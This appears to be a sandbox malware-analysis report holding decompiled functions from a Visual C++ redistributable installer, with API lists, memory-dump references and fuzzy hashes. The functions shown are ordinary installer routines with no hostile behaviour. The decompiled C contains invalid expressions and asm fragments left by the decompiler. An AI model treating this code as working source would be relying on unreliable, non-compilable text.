                                                                          			E0005076C(void* _a4, signed int* _a8) {
                                                                          				void* _v8;
                                                                          				void _v12;
                                                                          				long _v16;
                                                                          				int _t20;
                                                                          				signed short _t27;
                                                                          				long _t31;
                                                                          
                                                                          				_t31 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
                                                                          					_t20 = GetTokenInformation(_v8, 0x14,  &_v12, 4,  &_v16); // executed
                                                                          					if(_t20 == 0) {
                                                                          						_t31 =  <=  ? GetLastError() : 0x80004005 & 0x0000ffff | 0x80070000;
                                                                          						if(_t31 != 0x80070057) {
                                                                          							if(_t31 < 0) {
                                                                          								_push(_t31);
                                                                          								_push(0x35);
                                                                          								goto L8;
                                                                          							}
                                                                          						} else {
                                                                          							_t31 = 0;
                                                                          							 *_a8 = 0;
                                                                          						}
                                                                          					} else {
                                                                          						 *_a8 = 0 | _v12 != 0x00000000;
                                                                          					}
                                                                          				} else {
                                                                          					_t27 = GetLastError();
                                                                          					_t36 =  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					_t31 =  >=  ? 0x80004005 :  <=  ? _t27 : _t27 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t31);
                                                                          					_push(0x21);
                                                                          					L8:
                                                                          					_push("procutil.cpp");
                                                                          					E000137D3(0x80004005);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					FindCloseChangeNotification(_v8); // executed
                                                                          				}
                                                                          				return _t31;
                                                                          			}










                                                                          APIs
                                                                          • OpenProcessToken.ADVAPI32(?,00000008,?,000152B5,00000000,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005078A
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,000274AB,00000000), ref: 00050794
                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,000274AB,00000000), ref: 000507C6
                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,000274AB,00000000), ref: 0005081D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Token$ChangeCloseErrorFindInformationLastNotificationOpenProcess
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 2387526074-2144224329
                                                                          • Opcode ID: 291e091ebc82f436029ed11bf2e9d0b04615a659520eabdb46aa3a9279210c9e
                                                                          • Instruction ID: adf3a2e8fc910710cbe0ec1d9c531b8bfb5d0d1a398f6f2380fd03cf45cb6e59
                                                                          • Opcode Fuzzy Hash: 291e091ebc82f436029ed11bf2e9d0b04615a659520eabdb46aa3a9279210c9e
                                                                          • Instruction Fuzzy Hash: 03219671D40328EBEB209B958C48AAFBBE8EF54712F114166ED15E7190D7749E08DBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E000307E4(signed int __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
                                                                          				union _LARGE_INTEGER* _v8;
                                                                          				intOrPtr _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _t32;
                                                                          				signed short _t36;
                                                                          				signed short _t41;
                                                                          				signed short _t42;
                                                                          				void* _t46;
                                                                          				union _LARGE_INTEGER _t52;
                                                                          				signed int _t55;
                                                                          				signed int _t56;
                                                                          				intOrPtr _t60;
                                                                          				intOrPtr _t61;
                                                                          				signed short _t64;
                                                                          
                                                                          				_t55 =  *0x7aac0; // 0x0
                                                                          				_t61 = 0;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_t60 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t55 * 4)) + 4));
                                                                          				_t32 = _a12;
                                                                          				if(_t32 == 0) {
                                                                          					asm("cdq");
                                                                          					_t56 = __edx;
                                                                          					_t52 = _a8.LowPart +  *((intOrPtr*)(_t60 + 8));
                                                                          					asm("adc ecx, [edi+0xc]");
                                                                          					goto L7;
                                                                          				} else {
                                                                          					_t46 = _t32 - 1;
                                                                          					if(_t46 == 0) {
                                                                          						asm("cdq");
                                                                          						_t52 = _a8.LowPart;
                                                                          						_t56 = __edx;
                                                                          						goto L7;
                                                                          					} else {
                                                                          						if(_t46 == 1) {
                                                                          							_t56 =  *(_t60 + 0x14);
                                                                          							asm("adc ecx, [edi+0xc]");
                                                                          							asm("cdq");
                                                                          							_t52 =  *((intOrPtr*)(_t60 + 0x10)) +  *((intOrPtr*)(_t60 + 8)) + _a8.LowPart;
                                                                          							asm("adc ecx, edx");
                                                                          							L7:
                                                                          							_v8 = _t56;
                                                                          							_t36 = E000311CF(__eflags, _t60 + 0x1c, _a4, _t52, _t56,  &_v16, _a12);
                                                                          							__eflags = _t36;
                                                                          							if(_t36 == 0) {
                                                                          								L10:
                                                                          								_t25 =  &_v16;
                                                                          								 *_t25 = _v16 -  *((intOrPtr*)(_t60 + 8));
                                                                          								__eflags =  *_t25;
                                                                          							} else {
                                                                          								_push(_a12);
                                                                          								_t41 = SetFilePointerEx(_a4, _t52, _v8,  &_v16); // executed
                                                                          								__eflags = _t41;
                                                                          								if(_t41 != 0) {
                                                                          									goto L10;
                                                                          								} else {
                                                                          									_t42 = GetLastError();
                                                                          									__eflags = _t42;
                                                                          									_t64 =  <=  ? _t42 : _t42 & 0x0000ffff | 0x80070000;
                                                                          									__eflags = _t64;
                                                                          									_t61 =  >=  ? 0x80004005 : _t64;
                                                                          									E000137D3(0x80004005, "cabextract.cpp", 0x345, _t61);
                                                                          									E0005012F(_t61, "Failed to move file pointer 0x%x bytes.", _a8);
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t61 = 0x80070057;
                                                                          							_push("Invalid seek type.");
                                                                          							E0005012F();
                                                                          							_t56 = 0x80070057;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t60 + 0x30)) = _t61;
                                                                          				_t39 =  <  ? _t56 | 0xffffffff : _v16;
                                                                          				return  <  ? _t56 | 0xffffffff : _v16;
                                                                          			}


















                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 0003088A
                                                                          • GetLastError.KERNEL32(?,?,?), ref: 00030894
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastPointer
                                                                          • String ID: @Met$Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                          • API String ID: 2976181284-1358093670
                                                                          • Opcode ID: 4e6206332a51bdc7266a1abc502de69d8d9e9965ef4894c2e7ec4fb6e878052f
                                                                          • Instruction ID: a9e83e88f69e8113b04846c1f37ee69044ad20e2386b2703caa668d045d63107
                                                                          • Opcode Fuzzy Hash: 4e6206332a51bdc7266a1abc502de69d8d9e9965ef4894c2e7ec4fb6e878052f
                                                                          • Instruction Fuzzy Hash: A931AF31A0161AFFDB15DFA9CC959AEB7A9FF08720F008229F919A7651D730ED108BD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00054932(intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				long _t15;
                                                                          				char* _t18;
                                                                          				long _t25;
                                                                          				intOrPtr _t28;
                                                                          				void* _t31;
                                                                          				int _t32;
                                                                          
                                                                          				_t15 =  &_v8;
                                                                          				_push(_t15);
                                                                          				_push(_a4);
                                                                          				_t32 = 0;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				_v16 = 0;
                                                                          				L000594F0(); // executed
                                                                          				_t25 = _t15;
                                                                          				if(_t25 != 0) {
                                                                          					L4:
                                                                          					_t16 = GlobalAlloc(0, _t25);
                                                                          					_t31 = _t16;
                                                                          					if(_t31 != 0) {
                                                                          						_push(_t31);
                                                                          						_push(_t25);
                                                                          						_push(_v8);
                                                                          						_push(_a4);
                                                                          						L00059500(); // executed
                                                                          						if(_t16 != 0) {
                                                                          							L10:
                                                                          							_push( &_v16);
                                                                          							_t18 =  &_v12;
                                                                          							_push(_t18);
                                                                          							_push("\\");
                                                                          							_push(_t31);
                                                                          							L00059510();
                                                                          							if(_t18 != 0) {
                                                                          								L13:
                                                                          								_t28 = _v12;
                                                                          								 *_a8 =  *((intOrPtr*)(_t28 + 8));
                                                                          								 *_a12 =  *((intOrPtr*)(_t28 + 0xc));
                                                                          							} else {
                                                                          								_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          								if(_t32 >= 0) {
                                                                          									goto L13;
                                                                          								} else {
                                                                          									_push(_t32);
                                                                          									_push(0x122);
                                                                          									goto L9;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t32 =  <=  ? GetLastError() : _t22 & 0x0000ffff | 0x80070000;
                                                                          							if(_t32 >= 0) {
                                                                          								goto L10;
                                                                          							} else {
                                                                          								_push(_t32);
                                                                          								_push(0x11d);
                                                                          								L9:
                                                                          								_push("fileutil.cpp");
                                                                          								E000137D3(_t22);
                                                                          							}
                                                                          						}
                                                                          						GlobalFree(_t31);
                                                                          					} else {
                                                                          						_t32 = 0x8007000e;
                                                                          						_push(0x8007000e);
                                                                          						_push(0x119);
                                                                          						goto L3;
                                                                          					}
                                                                          				} else {
                                                                          					_t32 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
                                                                          					if(_t32 >= 0) {
                                                                          						goto L4;
                                                                          					} else {
                                                                          						_push(_t32);
                                                                          						_push(0x115);
                                                                          						L3:
                                                                          						_push("fileutil.cpp");
                                                                          						E000137D3(_t16);
                                                                          					}
                                                                          				}
                                                                          				return _t32;
                                                                          			}













                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 0005495A
                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00054989
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 000549B3
                                                                          • GetLastError.KERNEL32(00000000,0005B790,?,?,?,00000000,00000000,00000000), ref: 000549F4
                                                                          • GlobalFree.KERNEL32 ref: 00054A28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 1145190524-2299628883
                                                                          • Opcode ID: b45f9da891dab5bbc8a68085fb7b8e001f6ae43dcfbd62e54b47ad150fa53bba
                                                                          • Instruction ID: 1e056817fde012b0f92846e423c25e33b94e104b01e5dfa0384e7f01e0e9056d
                                                                          • Opcode Fuzzy Hash: b45f9da891dab5bbc8a68085fb7b8e001f6ae43dcfbd62e54b47ad150fa53bba
                                                                          • Instruction Fuzzy Hash: C021F235A40329ABE7219BA98C45EEFBBACEF84366F004116FD05E7241E734DC84D6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E00014013(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8) {
                                                                          				int _t5;
                                                                          				long _t7;
                                                                          				short _t12;
                                                                          				signed short _t14;
                                                                          				short* _t17;
                                                                          				WCHAR* _t19;
                                                                          				WCHAR* _t21;
                                                                          				short _t22;
                                                                          
                                                                          				_t21 = _a4;
                                                                          				_t22 = 0;
                                                                          				_t5 = CreateDirectoryW(_t21, _a8); // executed
                                                                          				if(_t5 != 0) {
                                                                          					L17:
                                                                          					return _t22;
                                                                          				}
                                                                          				_t7 = GetLastError();
                                                                          				if(_t7 != 0xb7) {
                                                                          					if(_t7 == 3 || E000140E2(_t21, 0) == 0) {
                                                                          						_t8 =  *_t21 & 0x0000ffff;
                                                                          						_t19 = _t21;
                                                                          						_t17 = 0;
                                                                          						if(( *_t21 & 0x0000ffff) == 0) {
                                                                          							L15:
                                                                          							_t22 = 0x80070003;
                                                                          							E000137D3(_t8, "dirutil.cpp", 0x72, 0x80070003);
                                                                          							goto L16;
                                                                          						} else {
                                                                          							_push(0x5c);
                                                                          							do {
                                                                          								_t17 =  ==  ? _t19 : _t17;
                                                                          								_t19 =  &(_t19[1]);
                                                                          								_t8 =  *_t19 & 0x0000ffff;
                                                                          							} while (( *_t19 & 0x0000ffff) != 0);
                                                                          							if(_t17 == 0) {
                                                                          								goto L15;
                                                                          							} else {
                                                                          								 *_t17 = 0;
                                                                          								_t22 = E00014013(_t21, _a8);
                                                                          								_t12 = 0x5c;
                                                                          								 *_t17 = _t12;
                                                                          								if(_t22 >= 0) {
                                                                          									if(CreateDirectoryW(_t21, _a8) != 0) {
                                                                          										_t22 = 0;
                                                                          									} else {
                                                                          										_t14 = GetLastError();
                                                                          										if(_t14 != 0xb7) {
                                                                          											_t22 =  <=  ? _t14 : _t14 & 0x0000ffff | 0x80070000;
                                                                          										} else {
                                                                          											_t22 = 1;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          								L16:
                                                                          								goto L17;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				L2:
                                                                          				_t22 = 0;
                                                                          				goto L17;
                                                                          			}












                                                                          APIs
                                                                          • CreateDirectoryW.KERNELBASE(0001533D,000153B5,00000000,00000000,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D), ref: 00014021
                                                                          • GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 0001402F
                                                                          • CreateDirectoryW.KERNEL32(0001533D,000153B5,00015381,?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000), ref: 00014097
                                                                          • GetLastError.KERNEL32(?,00029EE4,00000000,00000000,0001533D,00000000,000152B5,00000000,?,?,0001D4AC,0001533D,00000000,00000000), ref: 000140A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: @Met$dirutil.cpp
                                                                          • API String ID: 1375471231-1953925360
                                                                          • Opcode ID: 8ddf78bdfda0a03335c78edaf01b4637de5464ec0eb121c4a19acd2d2c16daca
                                                                          • Instruction ID: f31e20ed6ddb2ac6a44898cb5edb1099e9e39ed61a8bfbdba265b93dd1ff41c8
                                                                          • Opcode Fuzzy Hash: 8ddf78bdfda0a03335c78edaf01b4637de5464ec0eb121c4a19acd2d2c16daca
                                                                          • Instruction Fuzzy Hash: A511E735A00321AAEB721AE34C44BFBB698DF58B61F114125FF06EB170D7759C9192E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 44%
                                                                          			E00026915(WCHAR* _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                          				struct _SECURITY_ATTRIBUTES _v16;
                                                                          				void* _t10;
                                                                          				void** _t18;
                                                                          				void* _t22;
                                                                          				void* _t23;
                                                                          
                                                                          				_t18 = _a8;
                                                                          				_t23 = 0;
                                                                          				 *_t18 =  *_t18 | 0xffffffff;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_v16.bInheritHandle = 1;
                                                                          				_t10 = CreateFileW(_a4, 0x80000000, 5,  &_v16, 3, 0x80, 0); // executed
                                                                          				_t22 = _t10;
                                                                          				if(_t22 == 0xffffffff) {
                                                                          					L10:
                                                                          					return _t23;
                                                                          				}
                                                                          				_push(_t22);
                                                                          				_push(L"burn.filehandle.self");
                                                                          				_t23 = E00011F62(_a12, L"%ls -%ls=%u",  *_a12);
                                                                          				if(_t23 >= 0) {
                                                                          					_t14 = _a16;
                                                                          					if(_a16 == 0) {
                                                                          						L7:
                                                                          						 *_t18 = _t22;
                                                                          						_t22 = _t22 | 0xffffffff;
                                                                          						L8:
                                                                          						if(_t22 != 0xffffffff) {
                                                                          							CloseHandle(_t22);
                                                                          						}
                                                                          						goto L10;
                                                                          					}
                                                                          					_push(_t22);
                                                                          					_push(L"burn.filehandle.self");
                                                                          					_t23 = E00011F20(_t14, L"%ls -%ls=%u",  *_t14);
                                                                          					if(_t23 >= 0) {
                                                                          						goto L7;
                                                                          					}
                                                                          					_push("Failed to append the file handle to the obfuscated command line.");
                                                                          					L3:
                                                                          					_push(_t23);
                                                                          					E0005012F();
                                                                          					goto L8;
                                                                          				}
                                                                          				_push("Failed to append the file handle to the command line.");
                                                                          				goto L3;
                                                                          			}









                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 0002694B
                                                                          • CloseHandle.KERNEL32(00000000), ref: 000269BB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFileHandle
                                                                          • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                          • API String ID: 3498533004-3263533295
                                                                          • Opcode ID: ed8e9a00af5437ef3f8471de4259d0170e5827627d55cfe5046a12560384472f
                                                                          • Instruction ID: 1ec482dfa9a3c87faf4da424c37ed5892a23b2c190b421f73970c5502a739499
                                                                          • Opcode Fuzzy Hash: ed8e9a00af5437ef3f8471de4259d0170e5827627d55cfe5046a12560384472f
                                                                          • Instruction Fuzzy Hash: AF110B326007207FD7205A68AC05FAF779DDB49B31F110364FE14BF2D2DB7158558691
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E00050917(void* __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                                                                          				long _v8;
                                                                          				long _t9;
                                                                          				int _t11;
                                                                          				void* _t14;
                                                                          				long _t21;
                                                                          
                                                                          				_t21 = 0;
                                                                          				_v8 = 0;
                                                                          				_t9 = WaitForSingleObject(_a4, _a8);
                                                                          				_v8 = _t9;
                                                                          				if(_t9 != 0xffffffff) {
                                                                          					if(_t9 != 0x102) {
                                                                          						_t11 = GetExitCodeProcess(_a4,  &_v8); // executed
                                                                          						if(_t11 != 0) {
                                                                          							 *_a12 = _v8;
                                                                          						} else {
                                                                          							_t25 =  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
                                                                          							_t14 = 0x80004005;
                                                                          							_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t13 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t21);
                                                                          							_push(0x12a);
                                                                          							goto L2;
                                                                          						}
                                                                          					} else {
                                                                          						_t21 = 0x80070102;
                                                                          					}
                                                                          				} else {
                                                                          					_t28 =  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
                                                                          					_t14 = 0x80004005;
                                                                          					_t21 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t16 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t21);
                                                                          					_push(0x121);
                                                                          					L2:
                                                                          					_push("procutil.cpp");
                                                                          					E000137D3(_t14);
                                                                          				}
                                                                          				return _t21;
                                                                          			}









                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00050927
                                                                          • GetLastError.KERNEL32(?,?,00014E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00050935
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastObjectSingleWait
                                                                          • String ID: @Met$procutil.cpp
                                                                          • API String ID: 1211598281-2144224329
                                                                          • Opcode ID: 9b445aeb7b93d0aa36a6181e05ac839628f414a9c2116f4182718b1b3786cd41
                                                                          • Instruction ID: 8acf90c9adce8c0b1190af9fe1d013ebe221c59d9cf4fb791c0a0fcd0638b0c5
                                                                          • Opcode Fuzzy Hash: 9b445aeb7b93d0aa36a6181e05ac839628f414a9c2116f4182718b1b3786cd41
                                                                          • Instruction Fuzzy Hash: 8F11A132E00325EBFB209BA59C047AF7AD9EF04362F114216FD19EB291D3398D4096E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 0005344A
                                                                          • InterlockedIncrement.KERNEL32(0007B6D8), ref: 00053467
                                                                          • CLSIDFromProgID.OLE32(Msxml2.DOMDocument,0007B6C8,?,?,?,?,?,?), ref: 00053482
                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0007B6C8,?,?,?,?,?,?), ref: 0005348E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$IncrementInitializeInterlocked
                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                          • API String ID: 2109125048-2356320334
                                                                          • Opcode ID: dff67dfd71d7fdc6c187720be8019992b6bb0f78f70d4d5bc708582f8e5befbc
                                                                          • Instruction ID: 0deb90031fc079339fa2c181e4579e29aa659cd277e54fa025499bd8570456fa
                                                                          • Opcode Fuzzy Hash: dff67dfd71d7fdc6c187720be8019992b6bb0f78f70d4d5bc708582f8e5befbc
                                                                          • Instruction Fuzzy Hash: DEF0E521B4033557EB225BA5AC0DF173EA4AB81FE7F000414EE09E5194D37CF9858EB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 54%
                                                                          			E000531C7(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				intOrPtr _v20;
                                                                          				char _v28;
                                                                          				intOrPtr* _t23;
                                                                          				void* _t24;
                                                                          				signed int _t33;
                                                                          				void* _t35;
                                                                          				intOrPtr* _t38;
                                                                          				intOrPtr* _t39;
                                                                          				void* _t43;
                                                                          				void* _t44;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t43 = 0;
                                                                          				__imp__#8( &_v28);
                                                                          				_t23 = _a4;
                                                                          				_t24 =  *((intOrPtr*)( *_t23 + 0x44))(_t23,  &_v8);
                                                                          				_t44 = _t24;
                                                                          				if(_t44 < 0) {
                                                                          					L9:
                                                                          					_t38 = _v8;
                                                                          					if(_t38 != 0) {
                                                                          						 *((intOrPtr*)( *_t38 + 8))(_t38);
                                                                          					}
                                                                          					_t39 = _v12;
                                                                          					if(_t39 != 0) {
                                                                          						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                          					}
                                                                          					__imp__#9( &_v28);
                                                                          					if(_t43 != 0) {
                                                                          						__imp__#6(_t43);
                                                                          					}
                                                                          					return _t44;
                                                                          				}
                                                                          				__imp__#2(_a8);
                                                                          				_t43 = _t24;
                                                                          				if(_t43 != 0) {
                                                                          					_t44 = E0005336E( &_v12, _v8, _t43,  &_v12);
                                                                          					if(_t44 != 1) {
                                                                          						if(_t44 < 0) {
                                                                          							goto L9;
                                                                          						}
                                                                          						_t33 = _v12;
                                                                          						_t44 =  *((intOrPtr*)( *_t33 + 0x20))(_t33,  &_v28);
                                                                          						if(_t44 == 1) {
                                                                          							goto L4;
                                                                          						}
                                                                          						if(_t44 >= 0) {
                                                                          							_t35 = E000121A5(_a12, _v20, 0); // executed
                                                                          							_t44 = _t35;
                                                                          						}
                                                                          						goto L9;
                                                                          					}
                                                                          					L4:
                                                                          					_t44 = 0x80070490;
                                                                          					goto L9;
                                                                          				}
                                                                          				_t44 = 0x8007000e;
                                                                          				E000137D3(_t24, "xmlutil.cpp", 0x2a6, 0x8007000e);
                                                                          				goto L9;
                                                                          			}
















                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000531DD
                                                                          • SysAllocString.OLEAUT32(?), ref: 000531F9
                                                                          • VariantClear.OLEAUT32(?), ref: 00053280
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005328B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 760788290-1270936966
                                                                          • Opcode ID: f9908137c473a14a2e6457ca031625cbfa76c8dd5e0c61e44ff1e6bf9d0122b0
                                                                          • Instruction ID: 739f52fc32155b1b82348bd0c94cbef72389bdbf28e4bb717dd4b00726e156b5
                                                                          • Opcode Fuzzy Hash: f9908137c473a14a2e6457ca031625cbfa76c8dd5e0c61e44ff1e6bf9d0122b0
